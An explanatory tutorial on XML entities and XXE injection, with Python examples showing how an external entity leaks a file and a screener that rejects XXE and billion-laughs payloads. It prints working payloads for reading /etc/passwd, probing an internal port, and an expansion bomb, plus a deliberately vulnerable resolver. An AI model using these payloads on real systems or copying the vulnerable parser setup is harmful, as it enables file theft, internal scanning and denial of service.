XXE (XML External Entity Injection)

XXE is a vulnerability in how an application's XML parser handles entity declarations in untrusted input. To understand it, start with the kinds of entity XML supports.

XML entities come in four kinds: internal entities, parameter entities, predefined entities, and external entities.

Internal entity:

Declared in the DTD's internal subset (the <!DOCTYPE> declaration inside the document itself) and then referenced from the document body. When the XML document is parsed, each entity reference is replaced by the entity's replacement text.

Predefined entities:

entity   description
&quot;   double quote, i.e. "
&apos;   apostrophe, i.e. '
&lt;     less than, i.e. <
&gt;     greater than, i.e. >
&amp;    ampersand, i.e. &

The role of a DTD (Document Type Definition) is to define the legal building blocks of an XML document. A DTD can be declared inline within the XML document or referenced from an external file.

Internal DTD declaration

<!DOCTYPE root-element [element declarations]>

Reference to an external DTD

<!DOCTYPE root-element SYSTEM "filename">

or

<!DOCTYPE root-element PUBLIC "public_ID" "filename">

A DTD entity is a variable that defines a shortcut for a piece of text or a special character; it can be declared inline or refer to external content.

Internal entity declaration

<!ENTITY entity-name "value of the entity">

Parameter entities

Parameter entities exist only inside the DTD (the internal subset or an external DTD file) and serve to centralise and standardise definitions; they can only be referenced from within the DTD, never from the document body. Both the declaration and the reference of a parameter entity use a percent sign (%) where general entities use an ampersand (&). When the parser encounters a parameter entity reference in the DTD, the entity's replacement text becomes part of the DTD, so a parameter entity can inject further declarations, including other entity declarations. Because the percent sign (written literally or as its hex character reference &#x25;) is recognised while the DTD is still being parsed, the substitution happens before the DTD is validated and before any document content is processed.

Reference to an external entity

<!ENTITY entity-name SYSTEM "URI">

The SYSTEM keyword marks the entity as external. The URI can point to a local file (file://), an HTTP URL, and so on, depending on which protocols the parser's resolver supports:

libxml2    php               java       .net
file       file              http       file
http       http              https      http
ftp        ftp               ftp        https
           php               file       ftp
           compress.zlib     jar
           compress.bzip2    netdoc
           data              mailto
           glob              gopher *
           phar
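The following is an added example, not code from the original post, showing how the stdlib expat parser (the engine behind Python's xml.sax and ElementTree) expands each of the four entity kinds, and what "resolving an external entity" actually does when a parser is allowed to do it. The sample document, the temporary file standing in for /etc/passwd, and the function names are constructed for this illustration; the resolver uses urllib, which understands file://, http:// and ftp://, the same set as the libxml2 column of the table above.

```python
"""Added example (not from the original post): one entity of each kind, parsed
with external entity resolution switched off and then on."""
import tempfile
import urllib.request
import xml.parsers.expat as expat
from pathlib import Path


def demo_document(secret_uri: str) -> str:
    """Constructed sample. greeting = internal entity, shared = parameter entity
    (it injects the signoff declaration), &lt;&amp;&gt; = predefined entities,
    secret = external entity. secret_uri stands in for file:///etc/passwd."""
    return f"""<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE note [
  <!ENTITY greeting "hello">
  <!ENTITY % shared '<!ENTITY signoff "bye">'>
  %shared;
  <!ENTITY secret SYSTEM "{secret_uri}">
]>
<note>&greeting;|&lt;&amp;&gt;|&signoff;|&secret;</note>"""


def parse_text(xml_doc: str, resolve_external: bool) -> str:
    """Parse xml_doc and return its concatenated character data.

    resolve_external=True is the vulnerable configuration: the parser fetches
    whatever URI the (attacker-controlled) entity declaration names.
    resolve_external=False skips the reference so it expands to nothing, which
    is how Python's xml.sax behaves by default since 3.7.1.
    """
    chunks = []
    parser = expat.ParserCreate()
    parser.CharacterDataHandler = chunks.append
    # expat ignores %param; references in the internal subset unless told otherwise.
    parser.SetParamEntityParsing(expat.XML_PARAM_ENTITY_PARSING_ALWAYS)

    def on_external_entity(context, base, system_id, public_id):
        if not resolve_external:
            return 1  # skip: the reference contributes no text
        # Dangerous: dereference an attacker-chosen URI (file://, http://, ftp://).
        with urllib.request.urlopen(system_id) as resp:
            data = resp.read()
        # Parse the fetched bytes as an external parsed entity. The child parser
        # inherits CharacterDataHandler, so the file's text lands in `chunks`.
        child = parser.ExternalEntityParserCreate(context)
        child.Parse(data, True)
        return 1

    parser.ExternalEntityRefHandler = on_external_entity
    parser.Parse(xml_doc, True)
    return "".join(chunks)


def run_demo() -> tuple:
    """Write a constructed stand-in for /etc/passwd, then parse the sample with
    both configurations. Returns (hardened_result, vulnerable_result)."""
    secret = Path(tempfile.mkdtemp()) / "passwd"
    secret.write_text("root:x:0:0:root:/root:/bin/bash", encoding="utf-8")
    doc = demo_document(secret.as_uri())
    return (parse_text(doc, resolve_external=False),
            parse_text(doc, resolve_external=True))


if __name__ == "__main__":
    hardened, vulnerable = run_demo()
    print("external entities ignored :", hardened)
    print("external entities resolved:", vulnerable)
```

With resolution off the root element's text is "hello|<&>|bye|": the internal, parameter-injected and predefined entities all expand, and the external one is simply empty. With resolution on, the last field is the contents of the file, which is exactly the file-read payload shown later on this page. Note that the file's bytes are parsed as XML, so a file containing a bare < or & makes the parse fail rather than leak; that is what error-based and out-of-band XXE techniques work around.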

XXE attacks fall into three classes: in-band XXE (the expanded entity is echoed back in the response), error-based XXE (the data leaks through a parser error message), and blind XXE (nothing is echoed, so data has to be exfiltrated out-of-band).

Impact: when the parser is allowed to resolve external entities, an attacker who controls the XML can construct malicious content to read arbitrary files, probe ports on the internal network, attack internal websites, and, in some configurations (for example PHP with the expect:// wrapper enabled), execute system commands.

<!-- Arbitrary file read -->
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE rohit [
<!ENTITY abc SYSTEM "file:///etc/passwd">
]>
<abc>&abc;</abc>

<!-- Nested entity expansion causes denial of service (the "billion laughs" attack) -->
<?xml version="1.0"?>
<!DOCTYPE lolz [
<!ENTITY lol "lol">
<!ENTITY lol2 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;&lol;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
]>
<lolz>&lol9;</lolz>

<!-- Probe an internal network port -->
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "http://192.168.1.1:81">
]>
<x>&xxe;</x>
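All three payloads above can be recognised before the parser ever sees them. The following added example (not part of the original post) is a prolog screen: it accepts documents with no DOCTYPE, rejects external DTDs, any SYSTEM/PUBLIC entity and any parameter entity outright, and then computes how far the internal entities would expand so that the expansion bomb is rejected on size. The rule set and function names are my own; the payloads are re-entered from above as constructed inputs.

```python
"""Added example (not from the original post): screen an untrusted document's
prolog before it reaches the XML parser."""
import re

# group 1 = external identifier part, group 2 = internal subset (may be absent)
DOCTYPE_RE = re.compile(r"<!DOCTYPE\b([^\[>]*)(?:\[(.*?)\])?\s*>", re.S)
# groups: 1 = "% " for parameter entities, 2 = name, 3 = SYSTEM|PUBLIC,
# 4 = external identifier, 5 = quote, 6 = literal replacement text
ENTITY_RE = re.compile(
    r"""<!ENTITY\s+(%\s+)?(\S+)\s+(?:(SYSTEM|PUBLIC)\s+([^>]*?)|(["'])(.*?)\5)\s*>""", re.S)
REF_RE = re.compile(r"&(\w+);")


def entity_sizes(text: str) -> dict:
    """Map each internal general entity to the number of characters it expands to.
    Raises ValueError on a reference cycle (itself a well-formedness error)."""
    values = {m.group(2): m.group(6) for m in ENTITY_RE.finditer(text)
              if not (m.group(1) or m.group(3))}
    sizes, in_progress = {}, set()

    def expand(name: str) -> int:
        if name in sizes:
            return sizes[name]
        if name in in_progress:
            raise ValueError(f"recursive entity reference &{name};")
        in_progress.add(name)
        literal = values[name]
        size = len(literal)
        for ref in REF_RE.finditer(literal):
            if ref.group(1) in values:  # swap the "&name;" token for its expansion
                size += expand(ref.group(1)) - len(ref.group(0))
            # predefined or undeclared references keep their literal width (a slight over-estimate)
        in_progress.discard(name)
        sizes[name] = size
        return size

    for name in values:
        expand(name)
    return sizes


def screen_xml(doc: str, max_expansion: int = 100_000) -> tuple:
    """Return (accepted, reason). Only the prolog is inspected; the body is untouched."""
    m = DOCTYPE_RE.search(doc)
    if m is None:
        return True, "no DTD"
    external_id, subset = m.group(1), m.group(2) or ""
    if re.search(r"\b(SYSTEM|PUBLIC)\b", external_id):
        return False, "external DTD"
    for em in ENTITY_RE.finditer(subset):
        param, name, keyword, ext_id = em.group(1), em.group(2), em.group(3), em.group(4)
        if keyword:
            return False, f"external entity &{name}; -> {ext_id.strip()}"
        if param:
            return False, f"parameter entity %{name};"
    try:
        largest = max(entity_sizes(subset).values(), default=0)
    except ValueError as exc:
        return False, str(exc)
    if largest > max_expansion:
        return False, f"entity expansion bomb: {largest:,} characters"
    return True, f"internal DTD, largest entity expands to {largest} characters"


# Constructed inputs: the three payloads from above plus one harmless internal DTD.
FILE_READ = """<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE rohit [
<!ENTITY abc SYSTEM "file:///etc/passwd">
]>
<abc>&abc;</abc>"""

PORT_SCAN = """<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY xxe SYSTEM "http://192.168.1.1:81">
]>
<x>&xxe;</x>"""

BENIGN = """<?xml version="1.0"?>
<!DOCTYPE note [
<!ENTITY company "Example Corp">
]>
<note>&company;</note>"""


def billion_laughs(levels: int = 9) -> str:
    """Rebuild the expansion-bomb payload above: lol, then lol2..lol<levels>,
    each made of ten references to the previous entity."""
    decls = ['<!ENTITY lol "lol">']
    previous = "lol"
    for i in range(2, levels + 1):
        refs = f"&{previous};" * 10
        decls.append(f'<!ENTITY lol{i} "{refs}">')
        previous = f"lol{i}"
    return ('<?xml version="1.0"?>\n<!DOCTYPE lolz [\n' + "\n".join(decls)
            + f"\n]>\n<lolz>&{previous};</lolz>")


if __name__ == "__main__":
    for label, doc in [("file read", FILE_READ), ("billion laughs", billion_laughs()),
                       ("port scan", PORT_SCAN), ("benign", BENIGN)]:
        print(f"{label:15} -> {screen_xml(doc)}")
```

Running it prints a rejection reason for each of the three payloads and accepts the harmless document. The size computation makes the denial of service concrete: in the variant printed on this page (lol, lol2 .. lol9) the root reference expands to 10^8 copies of "lol", 300 MB of text from about 1 KB of input; the classic form adds one more level to reach 10^9. In production the simplest rule is to refuse any DOCTYPE at all (for example Xerces' disallow-doctype-decl feature, or resolve_entities=False in lxml); the screen here is mainly to make the numbers visible.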

Source: www.cnblogs.com/GH-D/p/11279045.html